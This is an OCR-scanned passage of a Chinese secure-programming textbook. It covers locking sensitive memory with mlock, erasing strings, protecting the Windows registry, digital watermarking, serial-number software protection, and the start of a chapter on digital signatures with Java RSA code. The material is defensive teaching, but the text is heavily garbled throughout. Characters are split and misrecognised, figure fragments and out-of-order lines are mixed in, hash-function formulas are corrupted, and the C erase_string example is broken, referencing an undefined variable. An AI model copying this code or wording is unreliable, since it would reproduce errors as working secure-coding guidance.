此 外 ,如 hiberfil. sys 也 是 此 种 性 质 的 文件 , 它 是 系统 休眠 文件 ,在 机 器 休眠 时 , 数 
据 保存 该 文件 , 它 可 以 通过 一 定 手段 删除 ,但 是 也 是 保证 系统 运行 性 能 的 一 种 有 效 
措施 。 

这 里 就 存在 一 个 问题 ,如 果 非 常 敏感 的 信息 ,由 于 没有 及 时 在 内 存 中 清除 ,在 换 页 
时 被 写 人 页 面 文件 ,就 有 可 能 被 敌 方 获取 。 

这 里 以 字符 串 为 例 , 来 讲解 该 问题 。 很 多 语言 中 的 字符 串 都 有 一 个 池 机 制 ,用 如 下 
方法 来 生成 一 个 字符 串 对 象 : 


String str = "China"; 


相当 于 在 字符 串 池 里 面 寻找 是 否 有 相同 内 容 的 字符 串 , 如 果 没 有 ,就 生成 新 对 象 放 
入 池 , 和 否则 就 使 用 池内 已 经 存在 的 字符 串 。 采 用 这 种 方法 ,是 为 了 提高 字符 串 的 处 理 速 
度 ,节省 内 存 空间 。 | 

不 过 ,这 隐 含 着 一 个 问题 ,因为 程序 员 事 先 无 法 预知 一 个 字符 串 将 要 使 用 多 久 ,或 
者 说 无 法 准确 控制 一 个 字符 串 的 生命 周期 .有 可 能 在 某 个 时 刻 ,这 个 字符 串 被 保存 到 硬 
盘 中 去 (如 发 生 操 作 系 统 换 页 时 被 保存 到 pagefile. sys 中 ,或 者 操作 系统 休眠 时 保存 到 
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hiberfil. sys 中 ); 特别 是 当 这 个 字符 串 中 保存 着 一 些 敏感 数据 ,如 密码 时 ,就 有 可 能 被 
攻击 者 获得 。 还 有 一 种 情况 ,有 时 候 程序 员 以 为 这 个 字符 串 已 经 被 使 用 完毕 ,但 是 由 于 
程序 员 过 分 依赖 垃圾 收集 机 制 , 结 果 导 致 字符 串 在 内 存 里 多 逗留 了 一 段 时 间 , 也 有 可 能 
进入 硬盘 空间 。 

要 解决 以 上 问题 ,可 以 采用 如 下 方法 : 

(1) 如 果 可 能 的 话 , 及 时 进行 强制 性 的 垃圾 收集 ; 关于 垃圾 收集 的 方法 ,在 前 面 的 
章节 有 所 讲解 ; 

(2) 如 果 数 据 量 不 大 ,将 敏感 数据 进行 加 密 。 

如 果 不 得 不 在 内 存 中 长 时 间 使 用 秘密 数据 , 那 就 可 以 将 数据 加 密 。 当 然 , 这 个 内 容 
不 属于 “数据 的 其 他 保护 方式 ”所 讨论 的 范围 ; 不 过 ,如 前 所 述 , 如 果 采 用 这 种 方法 , 必 


。 须 面临 两 个 问题 ， 


。 加密 解密 算法 的 使 用 要 消耗 一 定时 间 ; 
。 必须 用 有 效 的 方法 管理 密 钥 。 
(3) 可 以 对 内 存 进行 锁定 ,使 得 某 些 块 不 被 交换 到 文件 系统 。 由 于 操作 系统 可 以 


。 决定 获取 内 存 中 运行 的 部 分 程序 ,并 将 它们 保存 到 磁盘 ,所 以 在 某 些 语言 中 ,能 够 通过 
“锁定 "数据 以 免 交 换 调 出 。 


以 C 语 言 为 例 ,可 以 通过 如 下 函数 进行 锁定 : 


void * mem = malloc(numbytes); 
// 锁定 
mlock(mem, numbytes); 


mlock() 调用 锁定 方法 。 其 中 ,numbytes 是 锁定 的 字 节 数 , 这 样 ,该 内 存 范围 中 的 


所 有 字 节 都 将 在 RAM 中 锁定 ,不 会 因为 交换 被 保存 到 文件 ,直到 进程 通过 使 用 
| munlock() 来 解锁 为 止 。 


提示 。 以 上 锁定 ,是 以 页 面 为 单位 执行 的 ,一 旦 菜 页 上 有 内 容 被 锁定 ,那么 整个 
页 面 都 被 锁定 ,直到 进程 通过 使 用 munlock() 来 解锁 该 页 面 中 的 某 些 内 容 为 止 。 所 
以 ,过 多 的 锁定 会 让 系统 带 来 性 能 降低 ,特别 是 如 果 锁 定 大 量 数 据 时 ,很 容易 锁定 大 量 
的 页 ,实际 上 锁定 的 内 容 远 远 多 于 这 些 数 据 ; 另 一 个 方面 ,解锁 时 也 有 一 些 问题 ,如 果 


。 进程 锁定 的 多 个 资源 (如 缓冲 区 ) 碰 巧 在 同一 个 页 面 上 ,解锁 时 ,解锁 任 一 个 资源 都 会 导 


致 整个 页 面 解锁 ,也 就 是 多 个 资源 都 解锁 了 。 
因此 ,对 于 某 些 敏感 数据 ,在 分 配 内 存 时 ,尽量 分 配 到 同一 个 页 中 ,这 样 , 锁 定时 就 
直接 锁定 这 一 页 ,解锁 时 也 可 以 直接 解锁 这 一 页 。 


解锁 函数 和 锁定 函数 的 调用 方式 基本 一 致 : 


munlock(mem, numbytes); 


不 过 ,一 般 情况 下 ,正在 使 用 的 程序 是 不 支持 页 面 锁定 的 ,以 上 操作 需要 程序 在 管 


， 理 权限 下 运行 ; 如 果 不 用 锁定 的 办 法 ,那么 ,最 好 的 办 法 是 使 用 尽 可 能 小 的 内 存 块 ,并 
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尽快 地 使 用 和 擦 除 它 。 这 将 在 下 一 节 进 行 讲解 。 
13.3.2 从 内 存 擦 除数 据 


要 擦 除 内 存 中 的 数据 ,可 以 将 数据 内 存单 元 用 新 的 值 覆盖 。 
以 C 语 言 为 例 , 以 下 代码 实现 了 这 个 功能 : 


/* 用 \0' 来 覆盖 str * / 
void erase_string(char * str) 
{ 

while( * s) 

{ 

xsS++ = \0'; 

} 

} 


不 过 ,在 其 他 语言 中 , 控 除 敏感 数据 可 能 比较 困难 。 


13.4 注册 表 安 全 


13.4.1 注册 表 简 介 


注册 表 是 Windows 中 的 一 个 重要 功能 。 注 册 表 在 底层 ,是 一 个 庞大 的 数据 库 , 也 ， 
可 以 理解 为 一 个 文件 ,在 这 里 面 存储 了 一 些 重要 内 容 , 包 括 : | 
。 计算 机 软 硬 件 的 各 种 配置 数据 ; 
。 用 户 安装 在 计算 机 上 的 软件 和 程序 的 相关 信息 ,等 等 。 
用 户 可 以 通过 注册 表 , 做 一 些 和 系统 配置 有 关系 的 配置 ,如 : 
。 调整 软件 的 运行 性 能 ; 
。 检测 和 恢复 系统 错误 ; 
。 定 制 系统 风格 ,等 等 。 
注册 表 可 以 浏览 ,也 可 以 被 修改 ,一 般 在 注册 表 编辑 器 中 进行 。 以 Windows2000/ 
XP 为 例 ,在 “开始 ">“ 运 行 " 中 输入 regedit 命令 ,就 可 以 打开 注册 表 编 辑 器 ,如 图 13-7 
所 示 。 


站 
文件 但 ) 编辑 人 E) 查看 必 ) 收 讨 天 以 ) 帮助 0) 


se 
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注册 表 由 以 下 几 部 分 组 成 。 

。 键 (项 ): 相当 于 分 支 中 的 一 个 文件 夹 。 

。 子 键 ( 子 项 ) : 子 键 是 文件 夹 中 的 子 文件 夹 , 子 键 同 样 是 一 个 键 。 

。 值 项 : 值 项 是 一 个 键 的 当前 定义 ,由 名 称 、 数 据 类 型 以 及 分 配 的 值 组 成 。 对 于 
同一 个 键 ,可 以 给 它 设置 一 个 值 或 者 多 个 值 ,不 过 ,此 时 要 给 每 个 值 取 不 同 的 名 
称 ; 如 果 某 个 键 的 一 个 值 的 名 称 为 空 , 则 空 名 称 下 的 值 为 该 键 的 默认 值 。 

在 图 13-7 所 示 的 注册 表 编 辑 器 界面 中 ,各 主键 的 简单 介绍 如 下 : 

。 HKEY_CLASSES_ROOT: 是 系统 中 控制 所 有 数据 文件 的 键 。 

。 HKEY_CURRENT_USER: 当前 用 户 的 一 些 信息 。 

HKEY_LOCAL_MACHINE: 包含 了 一 些 对 系统 和 软件 进行 控制 的 键 。 

HKEY_USERS: 包含 了 用 户 的 信息 。 

。 HKEY_CURRENT_CONFIG: 包括 了 系统 中 现 有 的 所 有 配置 文件 的 细节 。 


13.4.2 注册 表 安 全 


由 于 注册 表 中 存储 了 一 些 系统 配置 ,如 果 注 册 表 受到 严重 的 损害 ,硬件 和 软件 的 运 
行 可 能 会 受到 很 大 的 限制 ,如 出 现 应 用 程序 运行 不 稳定 ,或 者 不 能 正常 的 运行 ,严重 时 


”甚至 出 现 系统 不 能 启动 的 情况 。 


可 以 通过 如 下 方法 进行 注册 表 的 保护 : 
(1) 设置 对 注册 表 键 的 访问 控制 权限 ,特别 设置 对 Regedit. exe 的 运行 限制 ,未 授 


。 权 的 用 户 ,根本 无 法 访问 注册 表 。 


。 用 户 恶意 修改 注册 表 , 马 上 将 其 设置 为 黑 名 单 ,禁止 其 下 一 次 
访问 。 


。 册 表 导出 为 文本 文件 ,必要 时 ,可 以 通过 导入 来 进 行 恢复 。 当 
。 然 ,也 可 以 将 注册 表 中 的 某 些 关键 的 键 进行 备份 ,必要 的 时 候 


该 措施 包括 以 下 几 个 方面 

。 对 于 本 地 用 户 , 设 置 注册 表 的 用 户 权限 ， 

。 有些 系统 中 ,注册 表 还 可 以 远程 访问 ,因此 ,对 远程 访问 的 用 户 也 要 严格 控制 权限 ; 
。 个 人 系统 中 可 禁用 注册 表 的 远程 访问 。 


(3) 养 成 备份 注册 表 的 习惯 ,可 在 注册 表 编 辑 器 中 ,将 注 


导入 ( 见 图 13-8) 。 


13.5 数字 水 印 


”13.5.1 数字 水 印 简介 


随 着 计算 机 网 络 技术 和 多 媒体 技术 的 迅速 发 展 , 大 量 的 多 媒体 数据 在 进行 数字 化 


之 后 在 网 上 传输 , 某 些 多 媒体 作品 的 生成 凝聚 了 作者 的 很 多 心血 ,然而 ,网 络 上 的 数据 
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容易 拷贝 ,容易 传播 ,这 也 使 盗版 者 能 以 低廉 的 成 本 盗版 未 经 授权 的 数字 产品 内 容 。 
此 ,出 于 对 利益 保护 的 考虑 ,数字 产品 的 版 权 所 有 者 迫切 需要 有 效 进行 知识 产权 的 保 
护 。 但 是 ,网 络 上 的 数据 是 数字 的 ,和 传统 的 数字 产品 格式 不 同 , 怎 样 对 数字 产品 进行 
版 权 保 护 呢 ? 
对 于 该 类 问题 ,一般 解决 的 方法 是 数字 水 印 。 
以 一 幅 图 像 作品 为 例 ,数字 水 印 是 永久 镶嵌 在 这 幅 图 像 作 品 ( 宿 主 数 据 ) 中 ,具有 可 | 
鉴别 性 的 数字 信号 或 模式 ,而且 并 不 影响 这 幅 图 像 作 品 (宿主 数据 ) 的 可 用 性 。 简 单 来 
讲 , 可 以 将 图 片 的 防伪 信息 嵌入 到 图 片 中 去 ,但 是 不 影响 图 片 本 身 的 视觉 效果 。 不 过 ， 
现在 ,数字 水 印 不 仅仅 应 用 于 图 像 ,也 应 用 于 音频 的 版 权 保护 。 
作为 数字 水 印 技术 基 本 上 应 当 满足 下 面 几 个 方面 的 要 求 。 
(1) 安全 性 : 安全 性 主要 体现 在 难以 算 改 或 伪造 和 较 低 的 误 检测 率 。 
(2) 隐蔽 性 : 数字 水 印 嵌 入 到 宿主 数据 中 ,但 是 应 该 是 不 可 知觉 的 ,如 数字 水 印 岩 
人 到 图 像 中 ,不 应 影响 图 像 的 外 观 视 觉 ,嵌入 到 音频 中 ,不 应 该 影响 听觉 效果 ; 总 之 ,不 
应 影响 宿主 数据 的 正常 使 用 。 
(3) 表达 能 力 : 水 印信 息 必须 足以 表示 多 媒体 内 容 的 创建 者 或 所 有 者 的 标志 信 
息 ,这 样 有 利于 保护 数字 产品 产权 合法 拥有 者 的 利益 。 
随 着 数字 水 印 技术 的 发 展 , 数 字 水 印 的 应 用 领域 也 得 到 了 扩展 ,如 : 
。 数字 作品 的 知识 产权 保护 。 可 以 将 数字 水 印 岩 入 到 作品 中 去 ,作为 版 权 标 识 ， 
该 标识 不 损害 原作 品 , 又 无 法 被 攻击 者 伪造 ; 如 IBM 在 其 “数字 图 书馆 ?软件 
中 提供 的 数字 水 印 功 能 ,Adobe 公司 在 Photoshop 软件 中 集成 了 的 数字 水 印 插 | 
件 等 。 | 

。 票据 防伪 。 由 于 复印 技术 的 发 展 ,使 得 货币 支票 等 票据 的 伪造 变 得 更 加 容易 ， 
但 是 可 以 在 单独 的 票据 中 加 入 数字 水 印 , 通 过 专业 手段 , 即 可 快速 辨识 真 伪 ， 
等 等 。 


13.5.2 数字 水 印 的 实现 


就 目前 公认 的 技术 而 言 ,数字 水 印 的 实现 主要 通过 一 定 的 算法 将 一 些 标志 性 信息 
直接 谋 到 多 媒体 内 容 。 骨 入 水 印 的 过 程 如 图 13-9 所 示 。 
水 印 的 检测 ,抽取 和 判断 过 程 如 图 13-10 所 示 。 
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宿主 数据 水 印信 息 待 检测 信号 | | 抽取 过 程 |=~ | 抽取 的 水 印 | [正版 水 印 ] 
全 对 
含水 印 的 信号 得 到 结论 
图 13-9 图 13-10 


数字 水 印 的 实现 技术 ,可 以 分 为 时 域 数字 水 印 和 频 域 数字 水 印 两 大 类 。 
较 早 的 数字 水 印 算法 本 质 上 都 是 在 时 域 上 进行 操作 ,如 充分 利用 某 些 像素 的 灰 度 
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信息 存储 空间 或 者 充分 利用 某 些 像素 的 彩色 信息 存储 空间 ,将 数字 水 印 直接 加 载 在 数 
据 上 。 时 域 数 字 水 印 具 有 算法 简单 、 速 度 快 .容易 实现 的 优点 。 

频 域 数字 水 印 是 通过 改变 频 域内 一 些 系数 的 值 ,采用 频 域内 变换 的 技术 来 实现 数 
字 水 印 。 在 频 域 数 字 水 印 中 用 到 的 技术 一 般 是 变换 ,如 离散 余弦 变换 、 小 波 变 换 等 。 频 
域 数 字 水 印 的 优点 主要 在 于 嵌入 的 质量 比较 好 ,水 印信 号 能 量 可 以 分 布 到 所 有 的 数据 
上 ,编码 比较 方便 等 。 

不 过 ,数字 水 印 是 一 个 活跃 的 话题 ,也 正 处 于 活跃 的 研究 阶段 ,在 一 些 著名 的 学 术 
期 刊 .杂志 或 者 技术 文献 上 经 常 可 以 看 到 水 印 方面 的 报道 ,有 兴趣 的 读者 可 以 参阅 相关 
文献 或 者 期 刊 。 


13.6 软件 版 权 保护 


某 些 软 件 的 作者 ,为 了 保证 自己 的 软件 的 版 权 , 或 者 仅仅 给 收费 者 使 用 ,通常 会 给 
软件 设置 一 个 注册 码 ( 序 列 号 ), 只 有 输入 注册 码 的 用 户 才能 使 用 里 面 的 全 部 功能 。 即 
让 用 户 用 注册 码 的 方式 来 激活 软件 。 这 属于 软件 版 权 保护 。 

序列 号 加 密 的 工作 原理 如 下 : 当 用 户 从 网 络 上 下 载 某 个 共享 软件 后 ,一 般 都 有 使 
用 时 间 上 的 限制 , 当 过 了 共享 软件 的 试用 期 后 ,必须 到 这 个 软件 的 公司 去 注册 后 方 能 继 


续 使 用 。 注 册 过 程 一 般 是 用 户 把 自己 的 私人 信息 (一 般 主要 指名 字 ) 连 同 信 用 卡号 码 告 
| 诉 给 软件 公司 ,软件 公司 会 根据 用 户 的 信息 计算 出 一 个 序列 号 ,在 用 户 得 到 这 个 序列 号 


后 ,按照 注册 需要 的 步骤 在 软件 中 输入 注册 信息 和 序列 号 ,其 注册 信息 的 合法 性 由 软件 


验证 通过 后 ,软件 就 会 取消 掉 本 身 的 各 种 限制 。 


如 果 要 保证 某 个 软件 只 能 在 某 台 机 器 上 运行 ,编写 注册 码 的 方法 很 多 ,如 果 采 用 非 
对 称 加 密 体系 ,一般 流 程 如 下 : 
(1) 软件 作者 事先 生成 一 对 公 钥 私 钥 ,将 公 钥 内 入 到 软件 中 。 在 软件 中 携带 一 个 


。 插件 ,可 以 得 到 一 个 可 以 唯一 确定 客户 机 器 的 数据 ,如 取 网 卡 的 MAC 地 址 .CPU 编 


号 、 硬 盘 序 列 号 等 。 这 里 相当 于 将 软件 和 特定 硬件 绑 定 , 如 果 硬 件 更 换 , 软 件 将 不 能 注 


。 册 。 该 数据 称 为 注册 用 户 名 。 


(2) 客户 通过 电子 邮件 等 手段 把 注册 用 户 名 发 给 软件 作者 ,软件 作者 用 私 钥 给 注 


。 册 用 户 名 加 密 ,结果 作为 序列 号 发 回 给 用 户 。 


。 册 用 户 名 。 


(3) 客户 拿 到 序列 号 之 后 ,在 注册 界面 上 输入 , 单 击 “ 注 册 ” 按 钮 将 序列 号 用 软件 中 
自 带 的 公 钥 解 密 , 和 注册 用 户 名 比 对 验证 ,得 出 结果 。 

还 有 一 种 基于 网 络 的 验证 方法 ,流程 如 下 : 

(1) 软件 作者 在 软件 中 携带 一 个 插件 ,可 以 得 到 一 个 可 以 唯一 确定 客户 机 器 的 注 


(2) 客户 通过 电子 邮件 等 手段 把 注册 用 户 名 发 给 软件 作者 ,软件 作者 用 某 种 不 公 
开 的 算法 将 注册 用 户 名 生成 一 个 序列 号 ,发 给 客户 。 

(3) 客户 拿 到 序列 号 之 后 ,在 注册 界面 上 输入 , 单 击 “ 注 册 ” 按 钮 ,此 时 程序 连接 到 
一 个 远程 网 站 ,该 网 站 将 注册 用 户 名 重新 用 算法 生成 序列 号 ,和 输入 的 序列 号 比 对 ,得 
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入 
出 结果 。 


当然 ,网 上 也 有 很 多 软件 注册 用 户 名 是 由 用 户 自己 定义 的 ,这 有 一 个 缺陷 : 当 用 户 
将 自己 的 用 户 名 和 序列 号 公之于众 ,这 个 软件 就 相当 于 可 以 被 很 多 人 使 用 。 


小 结 


本 章 对 数据 的 其 他 保护 方式 进行 了 详解 ,主要 集中 于 密码 保护 、 内 存 数据 保护 、 注 
册 表 保护 、 数 字 水 印 和 软件 版 权 保护 等 几 个 方面 的 问题 。 值 得 一 提 的 是 ,数据 的 保护 方 
式 由 于 应 用 场合 的 不 同 ,还 有 很 多 其 他 方法 ,读者 可 以 根据 实际 情况 采取 不 同 的 方法 。 


练 “ 习 


1. 序列 号 对 软件 版 权 保护 很 有 作用 。 

(1) 编写 一 个 Java 程序 ,用 13. 6 节 中 的 方法 给 其 添加 序列 号 功能 。 

(2) 怎样 破解 序列 号 ? 

2. 基于 13. 1 节 的 例子 进行 修改 : 如 果 用 户 正确 输入 账号 和 姓名 ,就 可 以 改 自己 的 
密码 。 

3. 查阅 相关 文献 ,寻找 一 种 简单 的 数字 水 印 生成 方法 ,并 实现 。 

4， 怎样 限制 内 存 数据 在 硬盘 上 的 交换 ? 

5 怎样 保护 注册 表 ? 


第 章 


数字 签名 


前 述 章节 讲解 了 数据 的 加 密 保 护 , 其 目的 是 将 要 保护 的 信息 变 成 伪装 信息 ,只 有 合 
法 的 接收 者 才能 从 中 得 到 真实 的 信息 。 加 密 保护 实际 上 防止 的 是 被 动 攻 击 。 在 这 种 攻 
击 模式 下 ,攻击 者 并 不 干预 通信 流量 ,只 是 尝试 从 中 提取 有 用 的 信息 。 最 简单 的 例子 就 
是 敌 方 通过 窃听 来 获取 代理 程序 中 存储 并 传递 的 敏感 信息 。 

实际 上 ,网 络 上 的 安全 问题 不 仅仅 只 限于 被 动 攻击 ,大 量 的 主动 攻击 也 是 网 络 安全 
上 需要 考虑 的 重要 问题 。 在 公共 网 络 环境 下 ,这 类 攻击 模式 的 普遍 方法 就 是 将 原 数据 
报 删 除 , 或 用 伪造 的 数据 取代 。 另 外 ,身份 伪装 也 可 看 作 一 种 主动 攻击 ,攻击 者 伪装 成 
系统 中 的 一 个 合法 参与 者 A, 截 取 并 处 理发 给 A 的 数据 。 

因此 ,除了 加 密 解 密 外 ,还 需要 对 信息 来 源 的 鉴别 、 保 证 信息 的 完整 和 不 可 否认 等 
功能 进行 保障 ,而 这 些 功能 通常 都 是 可 以 通过 数字 签名 实现 。 

本 章 首 先 讲解 了 数字 签名 的 原理 。 不 同 的 语言 对 于 数字 签名 的 实现 原理 基本 相 
同 ,本 章 以 Java 语言 为 例 , 实 现 了 数字 签名 算法 。 对 于 其 他 语言 实现 数字 签名 ,读者 可 
以 参考 其 他 文献 。 

本 章 最 后 通过 一 些 案例 ,解释 了 数字 签名 能 够 解决 自 改 和 抵赖 问 题 的 原理 。 


14.1 数字 签名 概述 


14.1.1 数字 签名 的 应 用 


数字 签名 主要 也 应 用 于 数据 安全 。 通 过 前 几 章 的 学 习 , 首 先 就 几 种 常见 的 信息 安 
全 问题 作 一 些 描 述 。 

(1) 窃听 : 特 指 交易 内 容 被 敌 方 截 获 .使 敌 方 得 知 一 些 不 应 该 传播 出 去 的 秘密 。 
属于 被 动 攻 击 。 

由 于 网 络 环境 的 特殊 性 , 敌 方 的 窃听 一 般 不 能 防止 ,唯一 的 方法 就 是 让 敌 方 窃听 之 
后 无 法 得 知 原来 的 内 容 , 一 般 的 解决 方法 是 加 密 。 关 于 加 密 解密 算法 ,在 前 面 章节 中 已 
经 叙述 。 
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(2) 纂 改 : 指 内 容 被 人 恶意 修改 或 者 删除 之 后 用 恶意 内 容 伪 装 ,使 得 收 方 得 到 的 
内 容 不 是 来 自发 方 的 初衷 。 

(3) 抵赖 : 指 以 下 两 种 情况 ,一 是 收 方 收 到 信息 ,然后 否认 收 到 发 过 来 的 信息 ; 另 
一 种 是 发 方 发 送 有 害 信息 ,然后 否认 发 送 过 该 信息 。 

自 改 和 抵赖 问题 主要 用 数字 签名 来 解决 。 

数字 签名 是 指使 用 密码 算法 ,对 待 发 的 数据 ( 报 文 或 票证 等 进行 加 密 处 理 ,生成 一 | 
段 数据 摘要 信息 附 在 原文 上 一 起 发 送 。 这 种 信息 类 似 于 现实 中 的 签名 或 印章 ; 接收 方 
对 其 进行 验证 ,判断 原文 真 伪 。 | 

数字 签名 可 以 提供 完整 性 保护 和 不 可 否认 服务 。 其 中 ,完整 性 保护 主要 针对 解决 
自 改 问题 ,不 可 否认 服务 主要 针对 解决 抵赖 性 问题 。 

一 般 说 来 ,传统 数字 签名 的 过 程 中 ,主要 先 采用 单 向 散 列 算法 (如 前 面 章节 所 说 的 
MD5 算法 ) ,对 原文 信息 进行 加 密 压 缩 形 成 消息 摘要 ,原文 的 任何 变化 都 会 使 消息 摘要 
发 生 改变 ; 然后 ,对 消息 摘要 用 非 对 称 加 密 算法 (如 前 文 所 述 的 RSA 算法 ) 进 行 加 密 。 
在 验证 阶段 , 收 方 将 信息 用 单 向 加 密 算法 计算 出 消息 摘要 ,然后 将 收 到 的 消息 摘要 进行 
解密 ,比较 两 个 消息 摘要 是 否 相 同 ,来 判断 信息 是 否 可 靠 。 详 细 过 程 , 下 一 节 将 有 叙述 。 


14.1.2 数字 签名 的 过 程 


在 数字 签名 方面 ,传统 情况 下 ,应 用 比较 广泛 的 是 : 

。 利用 RSA 算法 计算 签名 ; 

"” 数字 签名 标准 DSS。 | 

两 种 方法 实现 原理 类 似 。 其 中 ,利用 RSA 方法 进行 数字 签名 ,得 到 了 广泛 的 应 用 。 ， 
该 方法 的 过 程 如 下 : | 

(1) 利用 一 定 的 算法 (如 MD5), 将 要 签名 的 报 文 作为 一 个 散 列 函数 的 输入 ,产生 
一 个 定 长 的 安全 散 列 码 , 即 消息 摘要 。 

(2) 使 用 发 送 方 的 私有 密 钥 对 这 个 消息 摘要 进行 加 密 , 形 成 签名 。 

(3) 将 报 文 和 签名 传送 出 去 。 

(4) 接收 方 接收 报 文 ,并 根据 报 文 产生 一 个 消息 摘要 ,同时 使 用 发 送 方 的 公开 密 钥 
对 签名 进行 解密 。 | 
(5) 如 果 接 收 方 计算 得 出 的 消息 摘要 ,和 它 解密 后 的 签名 互相 匹配 ,那么 签名 就 是 | 
有 效 的 。 

(6) 因为 只 有 发 送 方 知道 私有 密 钥 ,并 对 签名 进行 了 加 密 , 因 此 只 有 发 送 方才 能 产 
生 有 效 的 签名 。 

具体 过 程 如 图 14-1 所 示 。 

如 前 所 述 , 数 字 签 名 算法 一 般 分 为 两 个 步骤: 

。 产生 消息 摘要 ; 

。 生成 数字 签名 。 

首先 ,系统 根据 一 定 的 单 向 加 密 算法 计算 出 消息 的 消息 摘要 。 注 意 ,此 处 的 “ 单 向 
加 密 算法 ”也 称 “ 单 向 散 列 函 数 ”, 单 向 加 密 算法 已 在 前 面 的 章节 提 及 ,本 章 将 对 其 进行 
原理 上 的 介绍 。 
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上 较 ,得 出 结论 
4 


14-1 


使 用 单 向 散 列 函数 的 目的 ,是 将 任意 长 度 的 消息 压缩 成 为 某 一 固定 长 度 的 消息 摘 


要 。 单 向 散 列 函数 又 称 为 单 向 Hash 函数 , 它 不 是 加 密 算法 , 却 在 密码 学 中 有 着 广泛 的 
| 应 用 ,与 各 种 加 密 算法 有 着 密切 的 关系 。 它 的 模型 为 : 


h= H(M) 
其 中 ,M 是 待 加工 的 消息 ,可 以 为 任意 长 度 ; 为 单 向 散 列 算法 ,h 作为 生成 的 消息 摘 


要 ,具有 固定 的 长 度 ,并 且 和 M 的 长 度 无 关 。 一 个 好 的 单 向 散 列 算法 需要 刀具 有 以 下 


， 行 的 


的 单 向 性 质 : 

。 给 定 五 和 M ,很 容易 计算 hh; 

。 给 定 六 和 五 ,很 难 计算 M, 甚 至 得 不 到 M 的 任何 消息 ; 

。 给 定 瓦 ,要 找 两 个 不 同 的 Mi 和 M: ,使 得 五 (M,) = 昌 (M) 在 计算 上 是 不 可 


在 实际 应 用 中 还 要 求 单 向 散 列 函 数 具 有 如 下 特点 : 

单 向 散 列 函 数 能 够 处 理 任 意 长 度 的 消息 (至 少 是 在 实际 应 用 中 可 能 碰 到 的 长 度 
的 消息 ) ,其 生成 的 消息 摘要 长 度 具 有 固定 的 大 小 ; 

对 同一 个 消息 反复 执行 该 函数 总 得 到 相同 的 消息 摘要 , 单 向 散 列 函 数 生成 的 消 
息 摘 要 是 不 可 预见 的 ,消息 摘要 看 起 来 和 原始 数据 没有 任何 关系 ; 

原始 数据 的 任何 微小 变化 都 会 对 生成 的 消息 摘要 产生 很 大 的 影响 ; 

具有 不 可 逆 性 , 即 通过 生成 的 消息 摘要 得 到 原始 数据 的 任何 信息 在 计算 上 是 完 
全 不 可 行 的 。 

目前 在 密码 学 上 已 经 设计 出 了 大 量 的 单 向 散 列 函数 ,如 RabinHash 方案 、 


MerkleHash 方案 .NHash 算法 .MD2 算法 .MD4 算法 .MD5 算法 和 SHA 等 。 通 过 考 


察 发 现 ,实际 系统 中 用 得 最 多 的 单 向 散 列 函数 是 消息 摘要 算法 MD5(Message Digest5) 
和 安全 散 列 算法 SHA(Security Hash Algorithm)。 它 们 具有 相似 的 原理 和 实现 方法 ， 


。 关于 它们 在 单 向 加 密 中 的 应 用 ,前 述 章节 已 经 叙述 。 


14.2 实现 数字 签名 


如 前 所 述 ,数字 签名 过 程 中 ,在 产生 签名 阶段 ,发送 方 至 少 要 进行 以 下 的 计算 : 
。 由 消息 M 利用 单 向 散 列 函 数 产 生 消息 摘要 HCM); 
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。 将 产生 的 消息 摘要 互 CM) 用 发 送 方 的 私有 密 钥 进行 加 密 。 | 
在 验证 签名 阶段 ,接收 方 也 要 进行 以 下 的 计算 

。 由 消息 M 利用 单 向 散 列 函数 产生 消息 摘要 HC(M); 

。 将 收 到 的 消息 摘要 末 (M) 用 发 送 方 公开 密 钥 进 行 解密 ; 

。 两 者 进行 比较 ,不 一 致 则 发 出 否决 消息 ,否则 接收 信息 。 


14.2.1 用 RSA 实现 数字 签名 


以 下 代码 是 用 Java 语言 实现 将 一 个 字符 串 “ 郭 克 华 _ 安 全 编程 技术 ”, 利 用 RSA 和 
SHA 算法 进行 数字 签名 并 且 验 证 的 过 程 ,同样 ,由 于 本 书 不 是 讲解 某 种 语言 本 身 ,所 以 
在 这 里 略 过 Java 加 密 体系 的 讲解 ,在 代码 中 如 果 出 现 新 的 API, 读 者 可 以 参考 Java 
文档 。 


P14_01. java 


import java. security. KeyPair; 

import java. security. KeyPairGenerator; 
import java. security. PrivateKey; 

import java. security. PublicKey; 

import java. security. Signature; 

import java. security. SignatureException; 


public class P14_01 
{ 
public static void main(String[ ] args) throws Exception 
{ 
String msg =" 郭 克 华 _ 安 全 编程 技术 "; 
System. out. println(" 原 文 是 :" + msg); 


byte[ ] msgBytes = msg.getBytes(); 


// 形成 RSA 密 钥 对 

KeyPairGenerator keyGen = KeyPairGenerator. getInstance( "RSA"); 
keyGen. initialize(1024); 

// 生成 公 钥 和 私 钥 对 

KeyPair key = keyGen. generateKeyPair( ); 


// 实例 化 Signature, 用 于 产生 数字 签名 ,指定 用 RSA 和 SHA 算法 
Signature sig = Signature. getInstance("SHA1WithRSA"); 

// 得 到 私 钥 

PrivateKey privateKey = key.getPrivate(); 

// 用 私 钥 来 初始 化 数字 签名 对 象 

sig. initSign(privateKey) ; 

// 对 msgBytes 实施 签名 

sig. update(msgBytes); 

// 完成 签名 ,将 结果 放 人 字 节 数组 signatureBytes 

byte[ ] signatureBytes = sig. sign(); 


String signature = new String(signatureBytes); 
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System. out. println(" 签 名 是 :" + signature); 


// 使 用 公 钥 验证 
PublicKey publicKey = key.getPublic(); 
sig. initVerify(publicKey); 
// 对 msgBytes 重新 实施 签名 
sig. update(msgBytes); 
try 
{ 

if(sig. verify(signatureBytes) ) 

{ 

System. out. println(" 签 名 验证 成 功 "); 


System. out. println(" 签 名 验证 失败 "); 

} 

} 

catch(SignatureException e) 

{ 
e.printStackTrace( ); 

} 

} 
} 


运行 后 的 结果 如 图 14-2 所 示 。 


在 不 同 的 情况 下 ,签名 的 内 容 是 不 一 样 的 ,因为 生成 的 密 钥 不 一 样 。 
14.2.2 用 DSA 实现 数字 签名 


在 第 12 章 介绍 了 DSA(Digital Signature Algorithm ,数字 签名 算法 ) , 它 也 是 一 种 
非 对 称 加 密 算法 ,被 美国 NIST 作为 数字 签名 标准 (DigitalSignature Standard,DSS) 。 
但 是 应 用 于 数字 签名 中 ,DSA 算法 比 RSA 产生 密 钥 的 速度 要 快 一 些 , 且 安全 性 与 RSA 
差不多 。DSA 的 理论 基础 ,主要 依赖 于 整数 有 限 域 离散 对 数 难 题 。 关 于 其 实现 过 程 ， 
读者 可 以 参考 相关 文献 。 

以 下 代码 是 用 Java 语言 实现 将 一 个 字符 串 * 郭 克 华 _ 安 全 编程 技术 ”, 利 用 DSA 算 
法 进行 数字 签名 并 且 验 证 的 过 程 .同样 ,由 于 本 书 不 是 讲解 某 种 语言 本 身 , 所 以 在 这 里 
